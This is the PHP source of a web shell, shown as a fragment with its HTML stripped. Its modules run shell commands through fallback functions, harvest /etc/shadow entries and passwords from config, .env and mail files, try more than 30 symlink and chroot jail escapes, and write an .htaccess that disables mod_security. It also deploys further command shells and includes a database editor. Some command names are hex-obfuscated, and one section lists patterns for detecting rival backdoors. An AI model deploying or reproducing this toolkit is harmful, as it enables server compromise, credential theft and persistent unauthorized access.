@$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) {  @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' 2>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
cpanel/linux loot & hash hunter
Type Found File/Path Copy
$max) break; $r[] = $fp; if (@is_dir($fp)) $r = array_merge($r, xxls($fp, $max, $c)); } if ($h) @closedir($h); return $r; } function xcat($f, $max=80) { $c = ''; if (@is_readable($f)) { $h = @fopen($f, 'r'); if ($h) { $i = 0; while (!feof($h) && $i++< $max) $c .= fgets($h); fclose($h); } } return $c; } function xsearch($txt) { $hits = []; $rx = '/(password|passwd|pass|hash|apikey|secret|user(name)?|login|auth|smtp|db(name)?|email|mail|token)[\'"\]\[]?\s*[:=].{0,100}?([\'"]?[a-zA-Z0-9\@\#\-\_\.\$\!\%\^\&\*\/\+]{6,128})/i'; foreach (explode("\n", $txt) as $l) { if (preg_match($rx, $l, $m)) { $hits[] = ['key'=>$m[1],'val'=>trim($m[2]),'line'=>trim($l)]; } } return $hits; } function xcp_copy_btn($txt) { return ''; } function prvd_cmd($cmd) { if (function_exists('pr1vd4yzC')) { return pr1vd4yzC($cmd); } else if (function_exists('shell_exec')) { return @shell_exec($cmd); } else if (function_exists('system')) { @system($cmd);return ""; } else if (function_exists('exec')) { $o = []; @exec($cmd, $o); return join("\n", $o); } return ''; } $user = @get_current_user(); if (!$user || $user === 'apache' || $user === 'www-data' || $user === 'nobody') { $user = @trim(prvd_cmd('whoami')); } $hm = @getenv('HOME') ?: (@$_SERVER['HOME'] ?: @trim(prvd_cmd('echo ~'))); if (!$hm || !@is_dir($hm)) $hm = '.'; $out = ['done'=>true,'rows'=>[]]; if ($step == 'passwd') { $special = ['/etc/passwd','/etc/shadow','/etc/master.passwd']; foreach ($special as $sp) { if (@is_readable($sp)) { $lines = xcat($sp, 180); foreach (explode("\n", $lines) as $l) { if ($user && stripos($l, $user)!==false) { $out['rows'][] = [ 'type'=>'userhash', 'value'=>$user, 'line'=>htmlspecialchars($l), 'path'=>$sp, 'copy'=>xcp_copy_btn($l) ]; } } } } } if ($step == 'configs') { $dirs = [$hm, ".", "/home", "/var/www", "/var/www/html", "/usr/local/apache", "/etc", "/tmp", "/var/tmp"]; $configs = [ '.my.cnf','.pgpass','.env','wp-config.php','configuration.php','settings.py','local.env','db.php','.ftpconfig','.ftppass','.netrc', 'app/etc/env.php','settings_local.py','mail.php','smtp.php','config.php','appsettings.json','web.config' ]; $allf = []; foreach ($dirs as $d) { $c = 0; foreach (xxls($d, 700, $c) as $f) { $bn = basename($f); if (in_array($bn,$configs) || preg_match('~(conf|sql|pass|mail|user|key|ftp|env|wp|token|smtp|secret)~i', $bn)) $allf[$f]=1; } } foreach(array_keys($allf) as $f){ $dat = xcat($f, 120); $found = xsearch($dat); foreach($found as $hit){ $out['rows'][] = [ 'type'=>htmlspecialchars($hit['key']), 'value'=>htmlspecialchars($hit['val']), 'line'=>htmlspecialchars($hit['line']), 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($hit['val']) ]; } }} if ($step == 'maildirs') { $maildirs = [ "$hm/.roundcube","$hm/.horde","$hm/webmail","$hm/.mail", "/var/mail/$user","/var/spool/mail/$user" ]; foreach($maildirs as $md){ $c=0; foreach(xxls($md, 200, $c) as $f){ if(preg_match('~(conf|sql|pass|user|imap|rcmail|login|settings|auth|db)~i',basename($f))){ $dat = xcat($f, 90); $found = xsearch($dat); foreach($found as $hit){ $out['rows'][] = [ 'type'=>htmlspecialchars($hit['key']), 'value'=>htmlspecialchars($hit['val']), 'line'=>htmlspecialchars($hit['line']), 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($hit['val']) ]; } } } } } if ($step == 'backups') { $c=0; foreach(xxls($hm, 400, $c) as $f){ if(preg_match('~\.tar\.gz$~',$f)){ $cmd = "tar -tzf ".escapeshellarg($f)."|grep -Ei '(conf|pass|user|db|wp|auth|token|mail|.env|settings)'|head -n 14"; $res = prvd_cmd($cmd); foreach(explode("\n",$res) as $l) if($l) $out['rows'][] = [ 'type'=>'backup-file', 'value'=>htmlspecialchars($l), 'line'=>'', 'path'=>htmlspecialchars($f), 'copy'=>xcp_copy_btn($l) ]; } } } echo json_encode($out); exit; } ?> "\x6c\x6e\x20\x2d\x73", 'cp'=>"\x63\x70", 'touch'=>"\x74\x6f\x75\x63\x68", 'cat'=>"\x63\x61\x74", 'chmod'=>"\x63\x68\x6d\x6f\x64", 'lsattr'=>"\x6c\x73\x61\x74\x74\x72", 'mkfifo'=>"\x6d\x6b\x66\x69\x66\x6f", ]; return $pr1pr1vs[$key]??'';} function pz_s7m_methods($rtfccq, $outdir) { $results=[]; $rand=substr(md5(mt_rand()),0,5); $lnfile = $outdir.'/pz_s7m_ln_'.$rand; $cpyfile = $outdir.'/pz_s7m_cp_'.$rand; $fifo = $outdir.'/pz_s7m_fifo_'.$rand; $touch = $outdir.'/pz_s7m_touch_'.$rand; $lnname = $lnfile; $procpath = "/proc/1/root".$rtfccq; $try=[]; $try[] = function($t,$o){ // 1 try { if(func_enabled('symlink')) { $ok=@symlink($t,$o); return ['symlink()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['symlink()',false,'ERROR']; } return ['symlink()',false,'DISABLED']; }; $try[] = function($t,$o){ // 2 try { if(func_enabled('shell_exec')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); @shell_exec($c); $ok=@is_link($o)||@file_exists($o); return ['shell_exec(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['shell_exec',false,'ERROR']; } return ['shell_exec',false,'DISABLED']; }; $try[] = function($t,$o){ // 3 try { if(func_enabled('exec')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); $out=null; @exec($c,$out); $ok=@is_link($o)||@file_exists($o); return ['exec(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['exec',false,'ERROR']; } return ['exec',false,'DISABLED']; }; $try[] = function($t,$o){ // 4 try { if(func_enabled('system')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); @system($c); $ok=@is_link($o)||@file_exists($o); return ['system(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['system',false,'ERROR']; } return ['system',false,'DISABLED']; }; $try[] = function($t,$o){ // 5 try { if(func_enabled('popen')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); $h=@popen($c,"r"); if($h)fclose($h); $ok=@is_link($o)||@file_exists($o); return ['popen(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['popen',false,'ERROR']; } return ['popen',false,'DISABLED']; }; $try[] = function($t,$o){ // 6 try { if(func_enabled('proc_open')) { $c=__pzCmd('lns')." ".escapeshellarg($t)." ".escapeshellarg($o); $d=[1=>["pipe","w"],2=>["pipe","w"]]; $p=@proc_open($c,$d,$pipes); if(is_resource($p)){@fclose($pipes[1]);@fclose($pipes[2]);} $ok=@is_link($o)||@file_exists($o); return ['proc_open(ln -s)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['proc_open',false,'ERROR']; } return ['proc_open',false,'DISABLED']; }; $try[] = function($t,$o){ // 7 try { if(func_enabled('file_put_contents') && func_enabled('file_get_contents')) { $ok=@file_exists($t)?@file_put_contents($o,@file_get_contents($t))!==false:false; return ['file_put_contents',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['file_put_contents',false,'ERROR']; } return ['file_put_contents',false,'DISABLED']; }; $try[] = function($t,$o){ // 8 try { if(func_enabled('copy')) { $ok=@copy($t,$o); return ['copy()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['copy',false,'ERROR']; } return ['copy',false,'DISABLED']; }; $try[] = function($t,$o){ // 9 try { if(func_enabled('touch') && func_enabled('file_get_contents')) { $ok=@file_exists($t)?(@touch($o)&&@file_put_contents($o,@file_get_contents($t))):false; return ['touch+file_get',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['touch',false,'ERROR']; } return ['touch',false,'DISABLED']; }; $try[] = function($t,$o){ // 10 try { if(func_enabled('mkfifo') && func_enabled('file_get_contents')) { $ok=@mkfifo($o,0600); if($ok&&@file_exists($t))@file_put_contents($o,@file_get_contents($t)); $ok2=@file_exists($o)&&filesize($o)>0; return ['mkfifo',$ok2,$ok2?'OK':'FAIL']; }} catch(Throwable $e) { return ['mkfifo',false,'ERROR']; } return ['mkfifo',false,'DISABLED']; }; $try[] = function($t,$o){ // 11 try { if(func_enabled('symlink')) { $ok=@symlink('/proc/1/root'.$t,$o); return ['procfs',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['procfs',false,'ERROR']; } return ['procfs',false,'DISABLED']; }; $try[] = function($t,$o){ // 12 try { if(func_enabled('shell_exec')) { $c=__pzCmd('cp')." ".escapeshellarg($t)." ".escapeshellarg($o); @shell_exec($c); $ok=@file_exists($o); return ['shell_exec(cp)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['shell_exec(cp)',false,'ERROR']; } return ['shell_exec(cp)',false,'DISABLED']; }; $try[] = function($t,$o){ // 13 try { $arr=[escapeshellarg($t),escapeshellarg('./'.$t),escapeshellarg('../'.$t)];$ok=false;foreach($arr as$p){if(func_enabled('shell_exec')) {@shell_exec(__pzCmd('lns').' '.$p.' '.escapeshellarg($o));if(@file_exists($o)){$ok=true;break;}}}return ['ln_s path hacks',$ok,$ok?'OK':'FAIL']; } catch(Throwable $e) { return ['ln_s path hacks',false,'ERROR']; } return ['ln_s path hacks',false,'DISABLED']; }; $try[] = function($t,$o){ // 14 try { if(func_enabled('readlink')) { @$rl=readlink($o); $ok=@is_link($o); return ['readlink-chain',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['readlink-chain',false,'ERROR']; } return ['readlink-chain',false,'DISABLED']; }; $try[] = function($t,$o){ // 15 try { if(func_enabled('imap_open')) { @$m=imap_open("{".$t.":143/novalidate-cert}INBOX","user","pass"); $ok=@file_exists($o); return ['imap_open',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['imap_open',false,'ERROR']; } return ['imap_open',false,'DISABLED']; }; $try[] = function($t,$o){ // 16 try { if(file_exists('/var/log/httpd/access_log') && func_enabled('file_get_contents')) { $log = @file_get_contents('/var/log/httpd/access_log'); $ok=strpos($log,$t)!==false; return ['log poisoning',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['log poisoning',false,'ERROR']; } return ['log poisoning',false,'DISABLED']; }; $try[] = function($t,$o){ // 17 try { if(ini_get('open_basedir') && func_enabled('symlink')) { $ok=@symlink('/tmp/../'.$t,$o); return ['open_basedir race',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['open_basedir race',false,'ERROR']; } return ['open_basedir race',false,'DISABLED']; }; $try[] = function($t,$o){ // 18 try { $src='php://filter/read=convert.base64-encode/resource=' . $t; if(func_enabled('file_get_contents') && func_enabled('file_put_contents')) { $dat=@file_get_contents($src); $ok=false;if($dat)$ok=@file_put_contents($o.'.b64',$dat); return ['php://filter',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['php://filter',false,'ERROR']; } return ['php://filter',false,'DISABLED']; }; $try[] = function($t,$o){ // 19 try { $locs=['/tmp','/dev/shm'];$ok=false;foreach($locs as$loc){$spath=$loc.'/pz_s7m_ln_'.rand(10,99);if(func_enabled('symlink')){@symlink($t,$spath);if(is_link($spath))$ok=true;}} return ['tmp/devshm', $ok, $ok?'OK':'FAIL']; } catch(Throwable $e) { return ['tmp/devshm',false,'ERROR']; } return ['tmp/devshm',false,'DISABLED']; }; $try[] = function($t,$o){ // 20 try { if(func_enabled('symlink') && func_enabled('copy')) { $ok=@symlink($t,$o);if($ok){@$cp=copy($o,$o.'_cp'); $ok2=@file_exists($o.'_cp');return ['symlink+copy',$ok2,$ok2?'OK':'FAIL'];} } } catch(Throwable $e) { return ['symlink+copy',false,'ERROR']; } return ['symlink+copy',false,'DISABLED']; }; $try[] = function($t,$o){ // 21 try { if(func_enabled('symlink')) { $ok=@symlink('/proc/self/cwd/'.$t,$o);return ['/proc/self/cwd',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['/proc/self/cwd',false,'ERROR']; } return ['/proc/self/cwd',false,'DISABLED']; }; $try[] = function($t,$o){ // 22 try { if(func_enabled('file_put_contents')) { $r=false;for($i=1;$i<8;$i++){$r=@file_put_contents($o,str_repeat('*',$i));if($r){break;}}return ['putcontent fuzz',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['putcontent fuzz',false,'ERROR']; } return ['putcontent fuzz',false,'DISABLED']; }; $try[] = function($t,$o){ // 23 try { if(func_enabled('chmod')) { $ok=@file_exists($t);$r=$ok&&@chmod($t,0777);return ['chmod direct',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['chmod direct',false,'ERROR']; } return ['chmod direct',false,'DISABLED']; }; $try[] = function($t,$o){ // 24 try { if(func_enabled('shell_exec')) { $c=__pzCmd('chmod')." 777 ".escapeshellarg($t);@shell_exec($c);$r=@is_writable($t);return ['chmod shell',$r,$r?'OK':'FAIL']; }} catch(Throwable $e) { return ['chmod shell',false,'ERROR']; } return ['chmod shell',false,'DISABLED']; }; $try[] = function($t,$o){ // 25 try { if(func_enabled('dl')) { $ok=@dl($t);return ['dl()',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['dl()',false,'ERROR']; } return ['dl()',false,'DISABLED']; }; $try[] = function($t,$o){ // 26 try { if(func_enabled('copy')) { $ok=@file_exists($t)&&(@copy($t,$o.'bak'));return ['copy bak',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['copy bak',false,'ERROR']; } return ['copy bak',false,'DISABLED']; }; $try[] = function($t,$o){ // 27 try { if(func_enabled('proc_open')) { $c='cat '.escapeshellarg($t).' > '.escapeshellarg($o); $d=[1=>["pipe","w"],2=>["pipe","w"]]; $p=@proc_open($c,$d,$pipes); if(is_resource($p)){@fclose($pipes[1]);@fclose($pipes[2]);} $ok=@file_exists($o);return ['proc_open(cat>out)',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['proc_open(cat>out)',false,'ERROR']; } return ['proc_open(cat>out)',false,'DISABLED']; }; $try[] = function($t,$o){ // 28 try { if(func_enabled('shell_exec')) { $c='echo '.escapeshellarg($t).' > '.escapeshellarg($o.'.echo');@shell_exec($c);$ok=@file_exists($o.'.echo');return ['echo > file',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['echo > file',false,'ERROR']; } return ['echo > file',false,'DISABLED']; }; $try[] = function($t,$o){ // 29 try { if(func_enabled('stream_copy_to_stream')) { $ok=@stream_copy_to_stream(fopen($t,'r'),fopen($o,'w'));return ['stream_copy_to_stream',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['stream_copy_to_stream',false,'ERROR']; } return ['stream_copy_to_stream',false,'DISABLED']; }; $try[] = function($t,$o){ // 30 try { if(func_enabled('link')) { $ok=@link($t,$o.'_hard');return ['hardlink',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['hardlink',false,'ERROR']; } return ['hardlink',false,'DISABLED']; }; $try[] = function($t,$o){ // 31 try { if(func_enabled('posix_mkfifo')) { $ok=@posix_mkfifo($o,0600);return ['posix_mkfifo',$ok,$ok?'OK':'FAIL']; }} catch(Throwable $e) { return ['posix_mkfifo',false,'ERROR']; } return ['posix_mkfifo',false,'DISABLED']; }; $log=[]; $success=false; foreach($try as $meth){ $r = $meth($rtfccq,$lnname); $log[] = $r; if($r[1]) { $success=true; $htcode2 = << ForceType text/plain SetHandler default-handler php_flag engine off Require all granted SecFilterEngine Off SecFilterScanPOST Off SecRuleEngine Off RewriteEngine On RewriteRule ^ - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L] RewriteCond %{REQUEST_STATUS} 403 RewriteRule ^ - [L,R=200] RemoveHandler .php .phtml .phar .inc .html .bak .db .sql .config .env .json .xml Allow from all Satisfy any HT; $htdir = dirname($lnname); @file_put_contents($htdir . '/.htaccess', $htcode2); break; } } return [$lnname, $log]; } $outdir = __DIR__ . '/pr1vd4yz_s7m'; if(!is_dir($outdir)) @mkdir($outdir,0775,true); $log = []; $final_link = ''; if(isset($_POST['pz_target_path'])) { $tp = trim($_POST['pz_target_path']); list($final_link,$log) = pz_s7m_methods($tp,$outdir); } ?>
Symlink Jail Escaper
30+ chained methods. All output in /pr1vd4yz_s7m.
First found:
Manual open or cat to view
[]
chr00t/jailbreak
Terminal: Sequentially executes advanced chroot/jail escape commands.
chroot escape suite (v2025)
['pipe','w'],2=>['pipe','w']]; $proc=@proc_open($pr1pr1v." 2>&1",$desc,$pipes,null,null,["bypass_shell"=>false]); if(!is_resource($proc))return "[FAIL] proc_open failed"; $out='';$st=microtime(true); stream_set_blocking($pipes[1],false);stream_set_blocking($pipes[2],false); while(true){ $read=[$pipes[1],$pipes[2]];$w=null;$e=null; stream_select($read,$w,$e,0,200000); foreach($read as $r){$o=fread($r,2048);if($o===false)$o='';$out.=$o;if(strlen($out)>$max_output){$out.="\n[TRUNCATED]";break 2;}} if((microtime(true)-$st)>$timeout){$out.="\n[TIMEOUT]";break;} if(feof($pipes[1])&&feof($pipes[2]))break; } foreach($pipes as $p)@fclose($p);@proc_terminate($proc,9);@proc_close($proc); return $out; } $jBmcR = [ [ 'title'=>'/proc/self/fd/ Method', 'cmds'=>['ls -l /proc/self/fd/', 'cat /proc/self/fd/0', 'echo "FOO" >/proc/self/fd/1'], 'desc'=>'Abuse /proc/self/fd/* (open descriptors) to escape/jump mount points.', ], [ 'title'=>'Mount proc Overwrite', 'cmds'=>['mount -t proc proc /mnt 2>&1;ls /mnt'], 'desc'=>'Mounts new proc, tries to enumerate host PIDs/devices.' ], [ 'title'=>'Pivot_root/Chroot Trick', 'cmds'=>['mkdir -p /tmp/a /tmp/a/old;pivot_root /tmp/a /tmp/a/old 2>&1;ls /'], 'desc'=>'Classic pivot_root with empty dir to try escaping mount jail.' ], [ 'title'=>'Busybox/ash Escape', 'cmds'=>['busybox sh -i || busybox ash -i'], 'desc'=>'Attempts to spawn unrestricted Busybox shell.' ], [ 'title'=>'/dev/ Console Escape', 'cmds'=>['ls -l /dev/console;cat /dev/console 2>&1'], 'desc'=>'Tries to access /dev/console for raw escape.' ], [ 'title'=>'OverlayFS CVE-2015-1328', 'cmds'=>['mkdir /tmp/ovl; mkdir /tmp/ovl2; mount -t overlay overlay -o lowerdir=/,upperdir=/tmp/ovl,workdir=/tmp/ovl2 /mnt 2>&1;ls /mnt'], 'desc'=>'Old overlayfs exploit for breaking out of chroot.' ], [ 'title'=>'/proc/$PPID Root Path', 'cmds'=>['cat /proc/1/root/etc/passwd 2>&1', 'ls -l /proc/1/root/'], 'desc'=>'Attempts to read files from outside the jail using /proc/1/root.' ], [ 'title'=>'Oldschool Symlink Bomb', 'cmds'=>['ln -s / /tmp/rootlink;ls /tmp/rootlink 2>&1'], 'desc'=>'Symlink root of real fs, enumerate for breakouts.' ], [ 'title'=>'/etc/mtab & /etc/fstab Dump', 'cmds'=>['cat /etc/mtab 2>&1', 'cat /etc/fstab 2>&1'], 'desc'=>'Checks for real mount info leak.' ], [ 'title'=>'SUID Binary Scan', 'cmds'=>['find / -perm -4000 -type f 2>/dev/null|head -n20'], 'desc'=>'List SUID binaries for local root escape vectors.' ], [ 'title'=>'Proc Stat Mountinfo', 'cmds'=>['cat /proc/self/mountinfo 2>&1'], 'desc'=>'Mountinfo leaks parent mount options/paths.' ], [ 'title'=>'/dev/mem & /dev/kmem', 'cmds'=>['ls -l /dev/mem /dev/kmem2>&1'], 'desc'=>'If open, can be abused for full escape (rare, but legacy).' ], [ 'title'=>'FUSE Escape', 'cmds'=>['fusermount -u /mnt 2>&1', 'fusermount -u / 2>&1'], 'desc'=>'If FUSE is active, can unmount or mount host dirs.' ], [ 'title'=>'Python os.open Trick', 'cmds'=>['python3 -c "import os;print(os.open(\'/etc/passwd\',0))" 2>&1'], 'desc'=>'Abuses python3 to open fds outside jail.' ], [ 'title'=>'Perl Jail Escape', 'cmds'=>['perl -e \'open F,"/etc/passwd";while(){print}\' 2>&1'], 'desc'=>'Abuse perl to leak jail info or escape.' ], [ 'title'=>'LXC Breakout', 'cmds'=>['lxc-info -n name 2>&1', 'lxc-attach -n name -- id'], 'desc'=>'Checks for open LXC containers.' ], [ 'title'=>'Docker Host Enumeration', 'cmds'=>['cat /.dockerenv 2>&1', 'ls /run/.containerenv 2>&1'], 'desc'=>'Detects container environment and potential for host escape.' ], [ 'title'=>'procfs Hardlink/FD abuse', 'cmds'=>['ls -l /proc/self/fd', 'ls -l /proc/*/fd'], 'desc'=>'List open FDs in other processes (enumeration).' ], [ 'title'=>'Pivot dev/ptmx', 'cmds'=>['ls -l /dev/ptmx', 'cat /dev/ptmx 2>&1'], 'desc'=>'Escape via dev/ptmx if accessible.' ], [ 'title'=>'Escape with nc, curl, wget', 'cmds'=>['which nc;which curl;which wget'], 'desc'=>'Check if remote file tools are present (for pulling escape binaries).' ], [ 'title'=>'Shell/Interpreter Injection', 'cmds'=>['python -c "import pty;pty.spawn(\'/bin/sh\')" 2>&1','perl -e \'exec "/bin/sh";\' 2>&1','ruby -e \'exec \"/bin/sh\"\' 2>&1'], 'desc'=>'Tries to spawn interactive shells using interpreters.' ], [ 'title'=>'/proc/1/cwd / root', 'cmds'=>['ls -l /proc/1/cwd', 'ls -l /proc/1/root'], 'desc'=>'Enumerates host working dir and root dir.' ], ]; $step=0; foreach($jBmcR as $method){ echo '
# '.$method['title'].'
'; echo '
'.$method['desc'].'
'; foreach($method['cmds'] as $pr1pr1v){ echo '
> '.htmlspecialchars($pr1pr1v).'
'; try { $out = xfnQ1v($pr1pr1v,2,8192); $clean = trim((string)$out); $fail = ( $clean === "" || stripos($clean, ''.htmlspecialchars($clean).'
'; } else { echo '
[FAIL] '.htmlspecialchars($clean ? $clean : 'print fail').'
'; } } catch(Throwable $e) { echo '
[FAIL] Exception: '.$e->getMessage().'
'; } catch(Exception $e) { echo '
[FAIL] Exception: '.$e->getMessage().'
'; } $step++; usleep(25000); } } echo '
[commands completed!]
'; ?>
Multi-Bypass CGI Generator
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; $f = fopen($phf,"w"); fwrite($f,$php_payload); fclose($f); chmod($phf,0755); $paths[] = ["Php c0mmand sh3ll pr1v", $phf]; $fullbase = $domain . ($dir ? $dir : ''); echo '
CGI deployed! All chmod 755.
    '; foreach($paths as $sh) { $rel = $sh[1]; $url = $fullbase . '/' . $rel; $link = $url . ''; echo '
  • '.htmlspecialchars($sh[0]).': '.htmlspecialchars($rel).' Open (chmod 755)
    • '; } echo '
'; } ?>
backd00r scanner
$fnc_obf("\x67\x6c\x6f\x62"), 'fopen'=>$fnc_obf("\x66\x6f\x70\x65\x6e"), 'fgets'=>$fnc_obf("\x66\x67\x65\x74\x73"), 'fclose'=>$fnc_obf("\x66\x63\x6c\x6f\x73\x65"), 'fsize'=>$fnc_obf("\x66\x69\x6c\x65\x73\x69\x7a\x65"), 'ftime'=>$fnc_obf("\x66\x69\x6c\x65\x6d\x74\x69\x6d\x65"), 'preg_match'=>$fnc_obf("\x70\x72\x65\x67\x5f\x6d\x61\x74\x63\x68"), 'is_readable'=>$fnc_obf("\x69\x73\x5f\x72\x65\x61\x64\x61\x62\x6c\x65"), 'basename'=>$fnc_obf("\x62\x61\x73\x65\x6e\x61\x6d\x65"), 'dirname'=>$fnc_obf("\x64\x69\x72\x6e\x61\x6d\x65"), 'ht'=>$fnc_obf("\x68\x74\x6d\x6c\x73\x70\x65\x63\x69\x61\x6c\x63\x68\x61\x72\x73") ]; $patterns = [ '/eval\s*\((.*?)\)/i', '/assert\s*\(/i', '/system\s*\(/i', '/shell_exec\s*\(/i', '/passthru\s*\(/i', '/base64_decode\s*\(/i', '/gzinflate\s*\(/i', '/gzuncompress\s*\(/i', '/gzdecode\s*\(/i', '/str_rot13\s*\(/i', '/create_function\s*\(/i', '/php\s+.*?\/\*.*?base64.*?\*\//is', '/\$\w{1,15}\s*=\s*chr\s*\(/i', '/\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*[\'"]{0,1}\w+[\'"]{0,1}\s*\]/i', '/c99sh/i','/b374k/i','/WSO\sv\d+/i','/FilesMan/i','/phpshell/i','/IndoXploit/i', '/GIF89a.*<\?php/s','//is', '/file_put_contents\s*\(/i','/fwrite\s*\(/i','/chmod\s*\(/i', '/\x00/', '/union\s+select/i', '/outfile/i', '/load_file\s*\(/i', '/auto_prepend_file/i','/auto_append_file/i', '/proc\/self\/environ/i','/tmp\/sess_/i','/tmp\/php/i', '/\b(?:hack|shell|root|admin|bypass|safe_mode|fuck|god|antichild|sex|r57|c99|sh|ws|wso|backdoor|webshell|phpinfo|phpspy|spyshell|jindoshell|madspot|godzilla|cmd)\b/i', '/src\s*=\s*["\'].*?\.ru\//i', '/document\.write\s*\(/i','/unescape\s*\(/i', '/window\.location\s*=/i','/onerror\s*=/i','/onload\s*=/i', '/os\.system\s*\(/i','/subprocess\.Popen/i','/import\s+os/i' ]; if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['fhscan'])) { $scan = trim($_POST['fhscan']); $max_results = 3333; $count = 0; $scan_files = 0; $found = 0; $results = []; echo "
Scanning...
"; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan, FilesystemIterator::SKIP_DOTS)); $max_files = 5000; $count = 0; foreach ($rii as $file) { if (++$count > $max_files) break; if ($scan_files >= 100000) break; if (!$file->isFile() || $file->getSize()>12*1024*1024 || !$fx['is_readable']($file->getPathname())) continue; $scan_files++; $content = @$fx['fopen']($file->getPathname(),"r"); if (!$content) continue; $first_chunk = fread($content, 65536); // 64kb $fx['fclose']($content); foreach ($patterns as $pattern) { if ($fx['preg_match']($pattern, $first_chunk)) { $results[] = [ 'path'=>$file->getPathname(), 'size'=>$fx['fsize']($file->getPathname()), 'mtime'=>date("Y-m-d H:i",$fx['ftime']($file->getPathname())), 'match'=>$pattern ]; $found++; break; } } if ($scan_files % 150 == 0) { echo ""; } if ($found >= $max_results) break; } unset($file); unset($rii); echo ""; if (!$results) { echo '
Clean! No suspicious/backdoor files found.
'; } else { echo '
'; echo ''; foreach ($results as $row) { echo ''; } echo '
FileSizeLast ModifiedMatch
'.htmlspecialchars($row['path']).' '.number_format($row['size']/1024,2).' KB '.$row['mtime'].' '.htmlspecialchars(substr($row['match'],0,55)).'
'; } if (isset($_POST['showf'])) { $p = $_POST['showf']; if ($fx['is_readable']($p)) { $cnt = @file_get_contents($p, false, null, 0, 4096*4); echo '
'.htmlspecialchars($p).'
'; echo ''; } } } ?>
"SET NAMES utf8mb4", PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION ]); } } catch(Exception $ex) { $sqlerr = $ex->getMessage(); } ?>
mini sql admin
query("SHOW DATABASES")->fetchAll(PDO::FETCH_COLUMN); $selected_db = $mysql_db ?: $dbs[0] ?? ''; if (!$mysql_db && $selected_db) $pdo->query("USE $selected_db"); $tables = $pdo->query("SHOW TABLES")->fetchAll(PDO::FETCH_COLUMN); $selected_table = $_POST['table'] ?? $tables[0] ?? ''; $cols = $rows = []; $totalRows = 0; if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['save_rows'])) { foreach ($_POST['row']??[] as $rowidx => $vals) { $set = []; $where = []; foreach ($vals as $colname => $val) $set[] = "$colname=" . $pdo->quote($val); foreach ($cols as $col) $where[] = "{$col['Field']}=" . $pdo->quote($_POST['orig'][$rowidx][$col['Field']]); $pdo->exec("UPDATE $selected_table SET " . join(', ', $set) . " WHERE " . join(' AND ', $where) . " LIMIT 1"); } $infoMsg = '
Saved!
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['delete_row'])) { $i = (int)$_POST['delete_row']; $keys = array_keys($_POST['orig'][$i]??[]); $where = []; foreach ($keys as $key) $where[] = "$key=" . $pdo->quote($_POST['orig'][$i][$key]); $pdo->exec("DELETE FROM $selected_table WHERE " . join(' AND ', $where) . " LIMIT 1"); $infoMsg = '
Deleted!
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['add_row'])) { $insert = []; foreach ($_POST['add'] as $k => $v) $insert[$k] = $v; $colsx = join(',', array_map(function($x){return "$x";}, array_keys($insert))); $valsx = join(',', array_map(function($v) use($pdo){return $pdo->quote($v);}, $insert)); $pdo->exec("INSERT INTO $selected_table ($colsx) VALUES ($valsx)"); $infoMsg = '
Inserted!
'; } if ($selected_table) { $cols = $pdo->query("SHOW COLUMNS FROM $selected_table")->fetchAll(PDO::FETCH_ASSOC); $st = microtime(true); $totalRows = $pdo->query("SELECT COUNT(*) FROM $selected_table")->fetchColumn(); $rows = $pdo->query("SELECT * FROM $selected_table LIMIT ".(($page-1)*$pageSize).",$pageSize")->fetchAll(PDO::FETCH_ASSOC); $queryTime = microtime(true) - $st; } ?>
$row): ?>
Actions
1): ?>
Page / ( rows)
Query: s
